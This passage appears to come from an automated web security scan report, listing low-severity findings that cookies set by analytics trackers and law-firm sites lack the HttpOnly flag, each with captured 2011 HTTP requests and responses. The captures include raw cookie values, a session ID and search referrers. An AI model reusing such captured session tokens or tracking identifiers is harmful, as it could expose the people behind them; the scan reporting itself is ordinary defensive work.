GET /HG?hc=wp148&hb=WR540421FKRS%3BDM54040296DE&cd=1&hv=6&n=/Institutional-Litigation-and-Consulting.asp%3B/SITE%20PAGE&con=&vcon=/PracticeAreas%3B/3133158/nldhlaw3/www.nldhlaw.com/PAGES&tt=none&ja=y&dt=11&zo=300&lm=1305218905000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=13&cy=u&hp=u&ln=en-US&vpc=HBX0100u&vjs=HBX0101.01u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=&epg=&cv=&gn=&ld=&la=&c1=fscontrol&c2=FS%20IV%3A%20FIRMSITE%20IV&c3=&c4=&customerid=&lv.id=&lv.pos=&ra=&rf=http%3A//www.nldhlaw.com/&pl=Java%20Deployment%20Toolkit%206.0.240.7%3AGoogle%20Update%3AJava%28TM%29%20Platform%20SE%206%20U24%3ASilverlight%20Plug-In%3AWPI%20Detector%201.3%3A HTTP/1.1
Host: ehg-findlaw.hitbox.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nldhlaw.com/PracticeAreas/Institutional-Litigation-and-Consulting.asp
Cookie: CTG=1305218582; DM54040296DEV6=V1rrrrr"rz%XrQB%eQe@^%riQXzBz^e%zBQ"%XrQB%iQQ@z%XrQB%eQe@"%XrQB%iQiB"%XrQB%iQQ@eXrrr@"BQzNV::W~a`ZIcdF:TxBr_amIhc:xBrf2_DFxBrGacdaTGIDWOz5)6<N5xB[<hWIT2cNa3k:h_F6%Q@@iXeirr6%XrQB%eQe@6X6r6r6X6r6r6%*ZIcdF:TxBQBr_amIhc:xBQBrf2_DFxBQBrGacdaTGIDWOxB5V::W~a6W::W~axB(c:m6b686r6b"56<N6B6r6X6r"V6B6r6X6rz(xB$Bre^rBixB$G:ka~~fhIcOfmITBxB$kkkxB(G:ka~~fhIcOfmITxB(c:mxB$YjV(}xB$})8(xBrYjV(z7}z)OuKr6%^zA6Bre^rBi6G:ka~~fhIcOfmITB6kkk|G:ka~~fhIcOfmIT|c:m6YjV(}6})8(HYjV(; WSS_GW=V1z%XrQB%eQe@; WR540427EECAV6=V1rrrrr"rz%XrQB%eQe@^%riQXzBz^^QzBQ"%XrQB%iQQ@z%XrQB%eQe@"%XrQB%iQiB"%XrQB%iQQ@eXrrr@"BQzNV::W~a`G:ka~~xBrfhIcOfmITz(xB$YhIcf2cajhaIFxB$(mG~:3maTfxB[5~I2mFxB[0Iu:hxB[ya~If2:TFxB(IFGz7}zA6YhIcf2cajhaIF6(mG~:3maTf"5~I2mF"0Iu:h"ya~If2:TF|IFGA65l65DFf:m65IFa"}fD_2aF|IFG; WR540421FKRSV6=V1rrrrr"rz%XrQB%ee%@rBrQCQz%zrzr"%XrQB%ee%@z%XrQB%ee%@"%XrQB%ee%@"%XrQB%ee%@rBrQCQ"rzNV::W~a`Ta~F:TxBr~aq2TaxBr_a~DcIxBrxBexBrO:hFfz(xB$[a7ID~fz7}zA6[a7ID~fzOffGxXjxB$xB$kkkxB(W::W~axB(c:mxB$FaIhcOxX$pxX[#a~F:TxBr0aq2TaxBr_a0DcIxBrxBQBexBr':hFfxBe2axX[Df7xB[ixBe:axX[Df7xB[ixBeIpxX[fxBeh~FxX[:hWxB(m:U2~~IxXjaTxB[=}xXj:772c2I~xBec~2aTfxX[72ha7:KxB[I; WR561118HFRZV6=V1rrrrr"rz%XrQB%eeXeBrreeBz%zrzr"%XrQB%eeXez%XrQB%eeXe"%XrQB%eeXe"%XrQB%eeXeBrreeB"rzNV::W~a`ZIcdF:TxBr_amIhc:xBrf2_DFxBrGacdaTGIDWOz(xB$[a7ID~fz7}zA6[a7ID~fzOffGxXjxB$xB$kkkxB(W::W~axB(c:mxB$FaIhcOxX$pxX[MIcdF:TxBr[alIhc:xBr82_DFxBrYacdaTGIDWOxBe2axX[Df7xB[ixBe:axX[Df7xB[ixBeIpxX[fxBeh~FxX[:hWxB(m:U2~~IxXjaTxB[=}xXj:772c2I~xBec~2aTfxX[72ha7:KxB[I

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:48:25 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM54040296DEV6=V1rrrrr"rz%XrQB%eQe@^%riQXzBz^e%zXCi"%XrQB%iQQ@z%XrQB%eQe@"%XrQB%i^rQ"%XrQB%iQQ@eXrrr@"XBXzNV::W~a`ZIcdF:TxBr_amIhc:xBrf2_DFxBrGacdaTGIDWOz5)6<N5xB[<hWIT2cNa3k:h_F6%Q@@iXeirr6%XrQB%eQe@6X6r6r6X6r6r6%*ZIcdF:TxBQBr_amIhc:xBQBrf2_DFxBQBrGacdaTGIDWOxB5V::W~a6W::W~axB(c:m6b686r6b"56<N6B6r6X6r"V6B6r6X6rz(xB$Bre^rBixB$G:ka~~fhIcOfmITBxB$kkkxB(G:ka~~fhIcOfmITxB(c:mxB$YjV(}xB$})8(xBrYjV(z7}z)OuKr6%^zA6Bre^rBi6G:ka~~fhIcOfmITB6kkk|G:ka~~fhIcOfmIT|c:m6YjV(}6})8(HYjV(A6X%XX%Qi6T~_O~IkX6kkk|T~_O~Ik|c:m6YjV(}6})8(HYjV(; path=/; domain=ehg-findlaw.hitbox.com; expires=Fri, 11-May-2012 16:48:25 GMT; max-age=31536000
Set-Cookie: WR540421FKRSV6=V1rrrrr"rz%XrQB%ee%@rBrQCQzBz%%CCzr"%XrQB%i^rQz%XrQB%ee%@"%XrQB%i^rQ"%XrQB%i^rQrBre@%"rzNV::W~a`Ta~F:TxBr~aq2TaxBr_a~DcIxBrxBexBrO:hFfz(xB$YhIcf2cajhaIFxB$)TFf2fDf2:TI~xB[02f2WIf2:TxB[IT_xB[5:TFD~f2TWxB(IFGz7}zA6YhIcf2cajhaIF6)TFf2fDf2:TI~"02f2WIf2:T"IT_"5:TFD~f2TW|IFG; path=/; domain=ehg-findlaw.hitbox.com; expires=Fri, 11-May-2012 16:48:25 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%XrQB%eQe@; path=/; domain=.hitbox.com; expires=Fri, 11-May-2012 16:48:25 GMT; max-age=31536000
Set-Cookie: CTG=1305218905; path=/; domain=.hitbox.com; expires=Thu, 19-May-2011 16:48:25 GMT; max-age=604800
nnCoection: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Thu, 12 May 2011 16:48:26 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;
18.73. http://ehg-findlaw.hitbox.com/HGct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-findlaw.hitbox.com
Path:   /HGct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HGct?hc=wp146&hb=WR561118HFRZ%3BDM54040296DE&cd=1&hv=6&n=/Default%3B/SITE%20PAGE&con=&vcon=/%3B/1511516/jdtplaw/www.jdtplaw.com/PAGES&tt=none&ja=y&dt=11&zo=300&lm=1305216558000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=13&cy=u&hp=u&ln=en-US&vpc=HBX0100u&vjs=HBX0101.01u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=&epg=&cv=&gn=&ld=&la=&c1=fscontrol&c2=FIRMSITE%20IV&c3=&c4=&customerid=&lv.id=&lv.pos=&ra=&rf=http%3A//www.google.com/search%3Fq%3DJackson+DeMarco+Tidus+Peckenpaugh%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a&pl=Java%20Deployment%20Toolkit%206.0.240.7%3AGoogle%20Update%3AJava%28TM%29%20Platform%20SE%206%20U24%3ASilverlight%20Plug-In%3AWPI%20Detector%201.3%3A HTTP/1.1
Host: ehg-findlaw.hitbox.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.jdtplaw.com/
Cookie: CTG=1305216633; DM54040296DEV6=V1rrrrr"rz%XrQB%eQe@^%riQXz%zrzQr"%XrQB%eQe@z%XrQB%eQe@"%XrQB%ee%@"%XrQB%eQe@^%riQX"QrzNV::W~a`Ta~F:TxBr~aq2TaxBr_a~DcIxBrxBexBrO:hFfz5)6<N5xB[<hWIT2cNa3k:h_F6%Q@@iXeirr6%XrQB%eQe@6%6r6r6B6r6r6%*Ta~F:TxBQBr~aq2TaxBQBr_a~DcIxBQBrxBQBexBQBrO:hFfxB5V::W~a6W::W~axB(c:m6b686r6b"56<N6%6r6B6r"V6%6r6B6rz(xB$Bre^rBixB$G:ka~~fhIcOfmITBxB$kkkxB(G:ka~~fhIcOfmITxB(c:mxB$YjV(}xB$})8(xBrYjV(z7}z)OuKr6%^zA6Bre^rBi6G:ka~~fhIcOfmITB6kkk|G:ka~~fhIcOfmIT|c:m6YjV(}6})8(HYjV(A6X%XX%Qi6T~_O~IkX6kkk|T~_O~Ik|c:m6YjV(}6})8(HYjV(zOffGxXjxB$xB$kkkxB(W::W~axB(c:mxB$FaIhcOxX$pxX[Y:ka~~xBr8hIcOfmITxBe2axX[Df7xB[ixBe:axX[Df7xB[ixBeIpxX[fxBeh~FxX[:hWxB(m:U2~~IxXjaTxB[=}xXj:772c2I~xBec~2aTfxX[72ha7:KxB[I; WSS_GW=V1z%XrQB%eQe@; WR540427EECAV6=V1rrrrr"rz%XrQB%eQe@^%riQXz%zrzr"%XrQB%eQe@z%XrQB%eQe@"%XrQB%eQe@"%XrQB%eQe@^%riQX"rzNV::W~a`G:ka~~xBrfhIcOfmITz(xB$[a7ID~fz7}zA6[a7ID~fzOffGxXjxB$xB$kkkxB(W::W~axB(c:mxB$FaIhcOxX$pxX[Y:ka~~xBr8hIcOfmITxBe2axX[Df7xB[ixBe:axX[Df7xB[ixBeIpxX[fxBeh~FxX[:hWxB(m:U2~~IxXjaTxB[=}xXj:772c2I~xBec~2aTfxX[72ha7:KxB[I; WR540421FKRSV6=V1rrrrr"rz%XrQB%ee%@rBrQCQz%zrzr"%XrQB%ee%@z%XrQB%ee%@"%XrQB%ee%@"%XrQB%ee%@rBrQCQ"rzNV::W~a`Ta~F:TxBr~aq2TaxBr_a~DcIxBrxBexBrO:hFfz(xB$[a7ID~fz7}zA6[a7ID~fzOffGxXjxB$xB$kkkxB(W::W~axB(c:mxB$FaIhcOxX$pxX[#a~F:TxBr0aq2TaxBr_a0DcIxBrxBQBexBr':hFfxBe2axX[Df7xB[ixBe:axX[Df7xB[ixBeIpxX[fxBeh~FxX[:hWxB(m:U2~~IxXjaTxB[=}xXj:772c2I~xBec~2aTfxX[72ha7:KxB[I

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:10:37 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM54040296DEV6=V1rrrrr"rz%XrQB%eQe@^%riQXz%zrz@r"%XrQB%eQe@z%XrQB%eQe@"%XrQB%eeX@"%XrQB%eQe@^%riQX"BrzNV::W~a`ZIcdF:TxBr_amIhc:xBrf2_DFxBrGacdaTGIDWOz5)6<N5xB[<hWIT2cNa3k:h_F6%Q@@iXeirr6%XrQB%eQe@6%6r6r6X6r6r6%*ZIcdF:TxBQBr_amIhc:xBQBrf2_DFxBQBrGacdaTGIDWOxB5V::W~a6W::W~axB(c:m6b686r6b"56<N6%6r6X6r"V6%6r6X6rz(xB$Bre^rBixB$G:ka~~fhIcOfmITBxB$kkkxB(G:ka~~fhIcOfmITxB(c:mxB$YjV(}xB$})8(xBrYjV(z7}z)OuKr6%^zA6Bre^rBi6G:ka~~fhIcOfmITB6kkk|G:ka~~fhIcOfmIT|c:m6YjV(}6})8(HYjV(A6X%XX%Qi6T~_O~IkX6kkk|T~_O~Ik|c:m6YjV(}6})8(HYjV(A6%Q%%Q%e6Z_fG~Ik6kkk|Z_fG~Ik|c:m6YjV(}6})8(HYjV(zOffGxXjxB$xB$kkkxB(W::W~axB(c:mxB$FaIhcOxX$pxX[Y:ka~~xBr8hIcOfmITxBe2axX[Df7xB[ixBe:axX[Df7xB[ixBeIpxX[fxBeh~FxX[:hWxB(m:U2~~IxXjaTxB[=}xXj:772c2I~xBec~2aTfxX[72ha7:KxB[I; path=/; domain=ehg-findlaw.hitbox.com; expires=Fri, 11-May-2012 16:10:37 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%XrQB%eQe@; path=/; domain=.hitbox.com; expires=Fri, 11-May-2012 16:10:37 GMT; max-age=31536000
Set-Cookie: CTG=1305216637; path=/; domain=.hitbox.com; expires=Thu, 19-May-2011 16:10:37 GMT; max-age=604800
Set-Cookie: WR561118HFRZV6=V1rrrrr"rz%XrQB%eeX@ririrBz%zrzr"%XrQB%eeX@z%XrQB%eeX@"%XrQB%eeX@"%XrQB%eeX@ririrB"rzNV::W~a`ZIcdF:TxBr_amIhc:xBrf2_DFxBrGacdaTGIDWOz(xB$[a7ID~fz7}zA6[a7ID~fzOffGxXjxB$xB$kkkxB(W::W~axB(c:mxB$FaIhcOxX$pxX[MIcdF:TxBr[alIhc:xBr82_DFxBrYacdaTGIDWOxBe2axX[Df7xB[ixBe:axX[Df7xB[ixBeIpxX[fxBeh~FxX[:hWxB(m:U2~~IxXjaTxB[=}xXj:772c2I~xBec~2aTfxX[72ha7:KxB[I; path=/; domain=ehg-findlaw.hitbox.com; expires=Fri, 11-May-2012 16:10:37 GMT; max-age=31536000
nnCoection: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Thu, 12 May 2011 16:10:38 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;
18.74. http://ehg-findlaw.hitbox.com/HGct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-findlaw.hitbox.com
Path:   /HGct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HGct?hc=wp148&hb=WR540421FKRS%3BDM54040296DE&cd=1&hv=6&n=/Default%3B/SITE%20PAGE&con=&vcon=/%3B/3133158/nldhlaw3/www.nldhlaw.com/PAGES&tt=none&ja=y&dt=11&zo=300&lm=1305216548000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=13&cy=u&hp=u&ln=en-US&vpc=HBX0100u&vjs=HBX0101.01u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=&epg=&cv=&gn=&ld=&la=&c1=fscontrol&c2=FS%20IV%3A%20FIRMSITE%20IV&c3=&c4=&customerid=&lv.id=&lv.pos=&ra=&rf=http%3A//www.google.com/search%3Fq%3DNelson+Levine+deLuca+%2526+Horst%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a&pl=Java%20Deployment%20Toolkit%206.0.240.7%3AGoogle%20Update%3AJava%28TM%29%20Platform%20SE%206%20U24%3ASilverlight%20Plug-In%3AWPI%20Detector%201.3%3A HTTP/1.1
Host: ehg-findlaw.hitbox.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nldhlaw.com/
Cookie: CTG=1305216615; DM54040296DEV6=V1rrrrr"rz%XrQB%eQe@^%riQXz%zrzr"%XrQB%eQe@z%XrQB%eQe@"%XrQB%eQe@"%XrQB%eQe@^%riQX"rzNV::W~a`G:ka~~xBrfhIcOfmITz5)6<N5xB[<hWIT2cNa3k:h_F6%Q@@iXeirr6%XrQB%eQe@6%6r6r6%6r6r6%*G:ka~~xBQBrfhIcOfmITxB5V::W~a6W::W~axB(c:m6b686r6b"56<N6%6r6%6r"V6%6r6%6rz(xB$Bre^rBixB$G:ka~~fhIcOfmITBxB$kkkxB(G:ka~~fhIcOfmITxB(c:mxB$YjV(}xB$})8(xBrYjV(z7}z)OuKr6%^zA6Bre^rBi6G:ka~~fhIcOfmITB6kkk|G:ka~~fhIcOfmIT|c:m6YjV(}6})8(HYjV(zOffGxXjxB$xB$kkkxB(W::W~axB(c:mxB$FaIhcOxX$pxX[Y:ka~~xBr8hIcOfmITxBe2axX[Df7xB[ixBe:axX[Df7xB[ixBeIpxX[fxBeh~FxX[:hWxB(m:U2~~IxXjaTxB[=}xXj:772c2I~xBec~2aTfxX[72ha7:KxB[I; WSS_GW=V1z%XrQB%eQe@; WR540427EECAV6=V1rrrrr"rz%XrQB%eQe@^%riQXz%zrzr"%XrQB%eQe@z%XrQB%eQe@"%XrQB%eQe@"%XrQB%eQe@^%riQX"rzNV::W~a`G:ka~~xBrfhIcOfmITz(xB$[a7ID~fz7}zA6[a7ID~fzOffGxXjxB$xB$kkkxB(W::W~axB(c:mxB$FaIhcOxX$pxX[Y:ka~~xBr8hIcOfmITxBe2axX[Df7xB[ixBe:axX[Df7xB[ixBeIpxX[fxBeh~FxX[:hWxB(m:U2~~IxXjaTxB[=}xXj:772c2I~xBec~2aTfxX[72ha7:KxB[I

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:10:19 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM54040296DEV6=V1rrrrr"rz%XrQB%eQe@^%riQXz%zrzQB"%XrQB%eQe@z%XrQB%eQe@"%XrQB%ee%^"%XrQB%eQe@^%riQX"QBzNV::W~a`Ta~F:TxBr~aq2TaxBr_a~DcIxBrxBexBrO:hFfz5)6<N5xB[<hWIT2cNa3k:h_F6%Q@@iXeirr6%XrQB%eQe@6%6r6r6B6r6r6%*Ta~F:TxBQBr~aq2TaxBQBr_a~DcIxBQBrxBQBexBQBrO:hFfxB5V::W~a6W::W~axB(c:m6b686r6b"56<N6%6r6B6r"V6%6r6B6rz(xB$Bre^rBixB$G:ka~~fhIcOfmITBxB$kkkxB(G:ka~~fhIcOfmITxB(c:mxB$YjV(}xB$})8(xBrYjV(z7}z)OuKr6%^zA6Bre^rBi6G:ka~~fhIcOfmITB6kkk|G:ka~~fhIcOfmIT|c:m6YjV(}6})8(HYjV(A6X%XX%Qi6T~_O~IkX6kkk|T~_O~Ik|c:m6YjV(}6})8(HYjV(zOffGxXjxB$xB$kkkxB(W::W~axB(c:mxB$FaIhcOxX$pxX[Y:ka~~xBr8hIcOfmITxBe2axX[Df7xB[ixBe:axX[Df7xB[ixBeIpxX[fxBeh~FxX[:hWxB(m:U2~~IxXjaTxB[=}xXj:772c2I~xBec~2aTfxX[72ha7:KxB[I; path=/; domain=ehg-findlaw.hitbox.com; expires=Fri, 11-May-2012 16:10:19 GMT; max-age=31536000
Set-Cookie: WR540421FKRSV6=V1rrrrr"rz%XrQB%ee%^r@ri^^z%zrzr"%XrQB%ee%^z%XrQB%ee%^"%XrQB%ee%^"%XrQB%ee%^r@ri^^"rzNV::W~a`Ta~F:TxBr~aq2TaxBr_a~DcIxBrxBexBrO:hFfz(xB$[a7ID~fz7}zA6[a7ID~fzOffGxXjxB$xB$kkkxB(W::W~axB(c:mxB$FaIhcOxX$pxX[#a~F:TxBr0aq2TaxBr_a0DcIxBrxBQBexBr':hFfxBe2axX[Df7xB[ixBe:axX[Df7xB[ixBeIpxX[fxBeh~FxX[:hWxB(m:U2~~IxXjaTxB[=}xXj:772c2I~xBec~2aTfxX[72ha7:KxB[I; path=/; domain=ehg-findlaw.hitbox.com; expires=Fri, 11-May-2012 16:10:19 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%XrQB%eQe@; path=/; domain=.hitbox.com; expires=Fri, 11-May-2012 16:10:19 GMT; max-age=31536000
Set-Cookie: CTG=1305216619; path=/; domain=.hitbox.com; expires=Thu, 19-May-2011 16:10:19 GMT; max-age=604800
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Thu, 12 May 2011 16:10:20 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;
18.75. http://ehg-findlaw.hitbox.com/HGct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-findlaw.hitbox.com
Path:   /HGct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HGct?hc=wp151&hb=WR540427EECA%3BDM54040296DE&cd=1&hv=6&n=/Default%3B/SITE%20PAGE&con=&vcon=/%3B/2069028/powelltrachtman2/www.powelltrachtman.com/PAGES&tt=none&ja=y&dt=11&zo=300&lm=1305216530000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=13&cy=u&hp=u&ln=en-US&vpc=HBX0100u&vjs=HBX0101.01u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=&epg=&cv=&gn=&ld=&la=&c1=fscontrol&c2=FS%20IV%3A%20FIRMSITE%20IV&c3=&c4=&customerid=&lv.id=&lv.pos=&ra=&rf=http%3A//www.google.com/search%3Fq%3DPowell+Trachtman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a&pl=Java%20Deployment%20Toolkit%206.0.240.7%3AGoogle%20Update%3AJava%28TM%29%20Platform%20SE%206%20U24%3ASilverlight%20Plug-In%3AWPI%20Detector%201.3%3A HTTP/1.1
Host: ehg-findlaw.hitbox.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.powelltrachtman.com/
Cookie: CTG=1305216564

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:09:29 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM54040296DEV6=V1rrrrr"rz%XrQB%eQe^reri%@z%zrzr"%XrQB%eQe^z%XrQB%eQe^"%XrQB%eQe^"%XrQB%eQe^reri%@"rzNV::W~a`G:ka~~xBrfhIcOfmITz5)6<N5xB[<hWIT2cNa3k:h_F6%Q@@iXeirr6%XrQB%eQe^6%6r6r6%6r6r6%*G:ka~~xBQBrfhIcOfmITxB5V::W~a6W::W~axB(c:m6b686r6b"56<N6%6r6%6r"V6%6r6%6rz(xB$Bre^rBixB$G:ka~~fhIcOfmITBxB$kkkxB(G:ka~~fhIcOfmITxB(c:mxB$YjV(}xB$})8(xBrYjV(z7}z)OuKr6^%zA6Bre^rBi6G:ka~~fhIcOfmITB6kkk|G:ka~~fhIcOfmIT|c:m6YjV(}6})8(HYjV(zOffGxXjxB$xB$kkkxB(W::W~axB(c:mxB$FaIhcOxX$pxX[Y:ka~~xBr8hIcOfmITxBe2axX[Df7xB[ixBe:axX[Df7xB[ixBeIpxX[fxBeh~FxX[:hWxB(m:U2~~IxXjaTxB[=}xXj:772c2I~xBec~2aTfxX[72ha7:KxB[I; path=/; domain=ehg-findlaw.hitbox.com; expires=Fri, 11-May-2012 16:09:29 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%XrQB%eQe^; path=/; domain=.hitbox.com; expires=Fri, 11-May-2012 16:09:29 GMT; max-age=31536000
Set-Cookie: CTG=1305216569; path=/; domain=.hitbox.com; expires=Thu, 19-May-2011 16:09:29 GMT; max-age=604800
Set-Cookie: WR540427EECAV6=V1rrrrr"rz%XrQB%eQe^reri%ez%zrzr"%XrQB%eQe^z%XrQB%eQe^"%XrQB%eQe^"%XrQB%eQe^reri%@"rzNV::W~a`G:ka~~xBrfhIcOfmITz(xB$[a7ID~fz7}zA6[a7ID~fzOffGxXjxB$xB$kkkxB(W::W~axB(c:mxB$FaIhcOxX$pxX[Y:ka~~xBr8hIcOfmITxBe2axX[Df7xB[ixBe:axX[Df7xB[ixBeIpxX[fxBeh~FxX[:hWxB(m:U2~~IxXjaTxB[=}xXj:772c2I~xBec~2aTfxX[72ha7:KxB[I; path=/; domain=ehg-findlaw.hitbox.com; expires=Fri, 11-May-2012 16:09:29 GMT; max-age=31536000
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Thu, 12 May 2011 16:09:30 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;
18.76. http://labs.natpal.com/trk/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://labs.natpal.com
Path:   /trk/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trk/pixel?trackid=&trkDomain=layserfreiwald.com&referrer=http%3A//www.elawmarketing.com/portfolio/websites/layser-freiwald&pageVisited=http%3A//layserfreiwald.com/&browser=Firefox&browserVersion=4&OS=Windows&maxHeight=1156&maxWidth=1920 HTTP/1.1
Host: labs.natpal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: uid=uidtest; Domain=natpal.com; Expires=Fri, 13-May-2011 18:09:01 GMT; Path=/
Location: http://labs.natpal.com/trk/pixel?trackid=&trkDomain=layserfreiwald.com&referrer=http%3A//www.elawmarketing.com/portfolio/websites/layser-freiwald&pageVisited=http%3A//layserfreiwald.com/&browser=Firefox&browserVersion=4&OS=Windows&maxHeight=1156&maxWidth=1920&npuid=test
Content-Language: en-US
Content-Length: 0
Date: Thu, 12 May 2011 18:09:01 GMT

18.77. http://m.perkinscoie.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.perkinscoie.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: m.perkinscoie.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.perkinscoie.com/professionals/professionals.aspx
Cookie: __utma=49731751.2135652298.1305216548.1305216548.1305218767.2; __utmc=49731751; __utmz=49731751.1305216548.1.1.utmccn=(organic)|utmcsr=google|utmctr=Perkins+Coie|utmcmd=organic; __utmb=49731751

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:46:18 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A68
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=3814; path=/
Set-Cookie: PortletId=4736294; path=/
Set-Cookie: SiteId=3811; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=s0z4wdju4luw2z2svixkbpyw; path=/; HttpOnly
